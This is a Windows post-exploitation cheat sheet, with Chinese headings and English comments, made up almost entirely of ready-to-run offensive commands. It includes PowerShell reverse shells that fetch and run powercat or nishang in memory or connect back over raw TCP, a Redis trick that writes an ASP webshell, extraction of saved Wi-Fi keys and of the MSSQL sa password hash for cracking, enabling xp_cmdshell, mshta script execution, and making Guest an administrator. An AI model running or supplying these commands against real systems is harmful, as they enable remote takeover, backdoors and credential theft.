windows实战常用命令
jar 解压jar包
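# Extract a jar (it is an ordinary zip) into the current directory; cd to the target
# directory first. -x extract, -v list each entry, -f archive name.
# The original kept its note (": 默认解压到当前目录") on the command line itself, where
# jar would receive it as extra arguments and fail — keep notes in comments.
jar -xvf xxx.jar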
powershell调用curl
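# Fetch a URL from Windows PowerShell. "curl" is only an alias of Invoke-WebRequest in
# Windows PowerShell 5.x; PowerShell 6+ dropped the alias, so "curl" there runs curl.exe,
# which rejects -UseBasicParsing. Calling the cmdlet by name works on both.
# -UseBasicParsing skips the Internet Explorer DOM parser (required on Server Core / hosts
# where IE first-run setup never happened).
powershell -c Invoke-WebRequest http://www.baidu.com -UseBasicParsing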
windows编为base64
# Base64-encode a file with certutil (built into Windows; no extra tooling needed).
# NOTE: the output is wrapped in "-----BEGIN CERTIFICATE-----" / "-----END CERTIFICATE-----"
# lines and folded at 64 columns; -decode accepts that format back. Use -encodehex for a
# hex dump instead.
certutil -encode a.txt encode.txt
# Reverse of the above. If it reports that the output file exists, delete a.txt first —
# certutil does not overwrite silently (confirm on the target build).
certutil -decode encode.txt a.txt
windows输出散列值
# Print a file hash without third-party tools. Supported algorithm names:
# MD2 MD4 MD5 SHA1 SHA256 SHA384 SHA512. Some older builds (e.g. Windows 7) are
# case-sensitive about the name — use upper case if the command errors.
certutil -hashfile 文件名 sha1/sha256/...
windows 特殊符号转义
PowerShell 中用反引号 ` 进行转义(例如 `" 、`$ );cmd 中则用 ^ 转义(例如 ^& 、^| 、^> ),两者不能混用。
windows 下载文件
# Download a file with certutil (built in). -urlcache uses the WinINet URL cache,
# -split writes the body to disk (name defaults to the URL's file name), -f forces a
# fresh fetch instead of a cached copy.
# OPSEC / forensics: a copy stays in the user's INetCache; remove it with
#   certutil -urlcache -f http://example.com/a.txt delete
certutil -urlcache -split -f http://example.com/a.txt
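# Download, then base64-encode the result.
# The original chained the two with "|". In cmd a pipe starts both commands at once and
# certutil -encode does not read stdin, so the encode could run before dll.txt was fully
# written. "&&" runs the second command only after the first one exits successfully.
certutil -urlcache -split -f http://192.168.1.51/dll.txt dll.txt && certutil -encode dll.txt edll.txt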
# Download through BITS (Windows 7 and later; bitsadmin is deprecated but still shipped).
# Arguments: job name, /download, priority, source URL, local destination. bitsadmin
# expects an absolute local path; "\\" in a cmd argument is just a doubled backslash, a
# single "\" works too. BITS jobs are logged (Microsoft-Windows-Bits-Client event log).
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\\phpstudy_pro\\WWW\\b.ps1"
# Download via .NET WebClient from a cmd prompt. cmd passes the single quotes through
# untouched, so PowerShell sees two string literals. The destination directory must
# already exist — DownloadFile does not create it.
powershell (new-object Net.WebClient).DownloadFile('http://192.168.203.140/a.ps1','E:\phpstudy_pro\WWW\a.ps1')
windows反弹shell
# Reverse cmd shell with powercat: the script is fetched and executed in memory (IEX), then
# powercat connects back (-c) to 192.168.1.4 on port 9999 (-p) and attaches cmd.exe (-e).
# Start a listener on the attacker side first. As the original note says, host the script
# on your own VPS: this URL points at the unpinned "master" branch, so whatever that branch
# serves at run time is what executes on the target.
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd
# Reverse PowerShell shell with nishang's Invoke-PowerShellTcp: -Reverse connects back to
# -IPAddress:-port. Start the listener on 192.168.203.140:6666 first.
# The URL pins a specific commit hash, so the fetched code is fixed — keep it that way (or
# mirror it on your own host) rather than switching to a branch name.
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
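# Raw TCP reverse shell with no download stage (same loop as nishang's Invoke-PowerShellTcp).
# 127.0.0.1:8081 is a placeholder for the listener's IP and port.
# -NoP no profile, -NonI non-interactive, -W Hidden hidden window, -Exec Bypass ignore the
# execution policy.
# Fix: the original never assigned the TCPClient to $client, so $client.GetStream() was a
# method call on $null and the one-liner died immediately; the assignment is required.
# Loop: read up to 64 KiB, run it with iex, send stdout+stderr ("2>&1") back with a
# "PS <cwd>> " prompt; Read returning 0 means the listener closed the connection.
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()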
系统错误代码
# Translate a Win32 / HRESULT error code into its message text (decimal or 0x hex, e.g.
# certutil -error 5 or certutil -error 0x80070005). Handy when a tool only prints a number.
certutil -error 错误代码
获取wifi密码信息
# List every saved WLAN profile (networks this machine has connected to).
netsh wlan show profiles
# Show the saved profile for SSID "Aaron"; key=clear prints the pre-shared key in plain
# text under "Key Content". Depending on the Windows build and profile type this may
# require an elevated prompt — confirm on the target.
netsh wlan show profiles name="Aaron" key=clear
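# Dump the saved key of every WLAN profile in one go (interactive cmd; inside a .bat write %%i/%%j).
# Outer loop: skip the header lines and take the text after ":" on each "All User Profile : NAME" line.
# Inner loop: for /f strips leading whitespace, which trims the space that follows the ":".
# The original trimmed by leaving %j unquoted, which breaks on SSIDs containing spaces, and its
# "echo %j | findstr -i -v echo |" stage fed nothing useful to netsh (netsh ignores stdin).
# Quoting the trimmed name keeps SSIDs with spaces intact.
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @for /f "tokens=*" %k in ("%j") do @netsh wlan show profiles name="%k" key=clear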
windows中的压缩/解压命令
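# Compress a single file with makecab. It produces a Microsoft Cabinet (CAB) archive — never
# a zip — so the original's ".zip" name was misleading (zip tools will not open it). Use
# backslashes: cmd-native tools parse "/" as a switch prefix in some positions.
makecab e:\test.txt e:\test.cab
# Extract one file back out; the destination directory must already exist.
expand e:\test.cab e:\test.txt
# Extract every file in the cabinet (-F:*) into a directory (which must exist).
expand -F:* test.cab E:\output\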
windows全局搜索文件
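# Recursive filename search for anything containing "flag" (interactive cmd; use %%i in a .bat).
# for /r walks every directory below the root; quote the root if it contains spaces.
for /r C:\ %i in (*flag*) do @echo %i
# dir equivalent: /s recurse, /b bare paths. The original "dir C:\ /b/s "flag"" listed the
# whole C:\ root and then only files named exactly "flag" — the wildcard has to be part of
# the pattern. 2>nul hides the "access denied" noise from protected directories.
dir C:\*flag* /b /s 2>nul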
redis写入文件
# Classic "write a file through the RDB dump" technique. Preconditions: CONFIG is reachable
# (unauthenticated Redis, or authenticated with CONFIG not renamed/disabled) and the redis
# process can write to the chosen directory. The dump is a binary file holding the whole
# keyspace; the "\n" padding puts the payload on its own line so the web server's parser
# still finds it. Record the original dir/dbfilename and restore them afterwards —
# leaving them changed breaks the target's persistence.
# NOTE: dir and the payload must match the target's web root and server-side language;
# the Linux path plus an ASP payload below is a placeholder combination.
config get dir
config set dir /var/www/
set aa "\n\n\n<%execute request('chopper')%>\n\n\n"
config get dbfilename
config set dbfilename aa.asp
save
注册表开启3389
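# Enable Remote Desktop by clearing fDenyTSConnections (needs an elevated prompt).
# The original used cmd's quote-toggling trick (Terminal" "Server) — it works, but quoting
# the whole key path is unambiguous and survives copy/paste.
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Same setting through WMI. wmic.exe is deprecated and may be absent on recent Windows 11 builds.
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
# If Windows Firewall is on, the Remote Desktop rule group must also be enabled, e.g.
#   netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# (the group name is localized — "远程桌面" on Chinese Windows).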
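# Disable Remote Desktop again. fDenyTSConnections is a DWORD flag: 1 denies; the original
# wrote 11111111, which only works because any non-zero value is treated as "deny".
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f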
# Show the RDP listener configuration, in particular PortNumber under ...\Tds\tcp (the port
# RDP listens on, 3389 by default). This is not a general "open ports" listing — use
# netstat -ano for that.
reg query "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds" /s
查询保存的登陆凭据
# mstsc connection history for the current user: one subkey per server connected to, with
# UsernameHint holding the last user name used (no passwords are stored here).
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
# List Credential Manager entries (target, type, user). Secrets themselves are not shown;
# the entries can still be reused by tools that run in this user's session.
cmdkey /l
MSSQL命令执行
# Enable xp_cmdshell and run an OS command. Requires the sysadmin role (ALTER SETTINGS).
# Commands run as the SQL Server service account, or as the proxy account configured with
# sp_xp_cmdshell_proxy_account for non-sysadmin callers.
# "GO" is a batch separator understood by sqlcmd/SSMS only, not T-SQL — drop it when the
# statements are sent through a driver or an injection point, and use ";" instead.
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell',1
GO
RECONFIGURE
GO
# Turning xp_cmdshell on is itself a configuration change that is logged/alerted in many
# environments; set it back to 0 when done.
exec xp_cmdshell 'whoami'
MSSQL数据查询
# Smoke test: current login and server version string.
select user,@@version
# All databases (legacy compatibility view; sys.databases is the modern equivalent).
select * from master.dbo.sysdatabases
# User table names in the current database ('u' = user table). Column names are NOT
# returned here — see the INFORMATION_SCHEMA query below for those.
select b.name tablename
from sys.objects b where b.type='u' order by b.name
# Columns and data types of one table.
SELECT * FROM INFORMATION_SCHEMA.columns WHERE TABLE_NAME='C_STUDYPROJECT'
# Login password hashes. syslogins.password is a legacy column and is NULL on current
# versions; the sys.sql_logins query is the one that actually returns the hash.
select name,password from syslogins
# Hash of the sa login as a hex string (crackable offline with hashcat mode 1731 on 2012+).
Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = 'sa'
mshta 命令
mshta在一般的应用中都不需要什么特别的参数,如:
# mshta.exe runs HTML Applications with full script-host privileges and accepts a local
# file, a URL, or an inline vbscript:/javascript: payload. It is a well-known LOLBin
# (MITRE ATT&CK T1218.005): on the defensive side, mshta with a URL or script: argument
# on the command line is a high-signal detection.
mshta C:\test.hta
mshta "%cd%\test.html"
# Remote URL: the page is fetched and its script executed without a download step.
mshta http://www.google.com.hk
mshta about:blank
# Inline VBScript; the trailing (window.close) closes the HTA after the dialog.
mshta vbscript:alert("hello")(window.close)
# execScript switches language mid-payload (VBScript host running JavaScript, and vice versa).
mshta vbscript:window.execScript("alert('hello world!');","javascript")
# ":" is the VBScript statement separator.
mshta javascript:window.execScript("msgBox('hello world!'):window.close","vbs")
mshta vbscript:msgbox("是否确定?",36,"确认")(window.close)
mshta javascript:alert('hello');window.close();
# COM access from the inline script — this is what makes mshta a code-execution vector.
mshta vbscript:CreateObject("Shell.Application").MinimizeAll()(close)
windows激活guest
# Enable the built-in Guest account (disabled by default), make it a local administrator and
# set a password. All three need an elevated prompt and each one writes a Security event
# (4722 account enabled, 4732 member added to local group, 4724 password reset) — noisy.
# The new password must satisfy the local password policy or the last command fails.
net user Guest /active:yes
net localgroup administrators Guest /add
net user Guest Guest123
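# Create a local user (elevated prompt). The password is on the command line, so it lands
# in command-line auditing / PowerShell history; use "net user NAME * /add" to be prompted
# instead when that matters.
net user 用户名 密码 /add
# Make the user a local administrator.
net localgroup administrators 用户名 /add
# Grant remote-desktop logon: members of "Remote Desktop Users" may log on via RDP.
# (The original kept this note on the command line after a "#", which cmd does not treat
# as a comment — "net localgroup" received it as extra arguments and errored.)
net localgroup "Remote Desktop Users" 用户名 /add
# Allow the user to change their own password.
net user 用户名 /passwordchg:yes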